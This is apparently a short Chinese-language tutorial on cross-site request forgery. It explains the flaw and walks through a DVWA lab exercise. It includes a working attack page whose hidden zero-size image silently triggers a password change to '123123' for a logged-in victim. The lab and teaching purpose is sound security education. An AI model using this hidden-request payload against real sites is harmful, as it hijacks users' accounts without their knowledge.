CSRF漏洞原理
web应用程序在用户进行敏感操作时,如修改账号密码,添加账号,转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用被攻击者的身份完成对应的而已请求.
CSRF练习
- 打开dvwa测试系统,登录.
- 打开抓包工具,进入CSRF练习页面,修改密码,提交
- 修改抓取的报文,删除referer字段,重新提交.
- 修改密码成功,说明存在CSRF漏洞.
- 构造攻击页面,代码:
<!DOCTYPE HTML PUBLIC "-//w3c/DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWAP CRSFTester Demonstration</title>
</head>
<body>
<h2>OWASP CRSFTester Demonstration</h2>
<img src="http://xx.xxx.xx.x:8080/dvwa/vulnerabilities/csrf/?password_new=123123&password_conf=123123&Change=%B8%FC%B8%C4" width="0" height="0" border="0"/>
</body>
</html>
-
点击攻击页面.html文件. 因为用户处于登录dvwa系统的状态,通过抓包可以看到此时会自动填充Cookie等信息,自动修改用户密码成功.
image.png
网友评论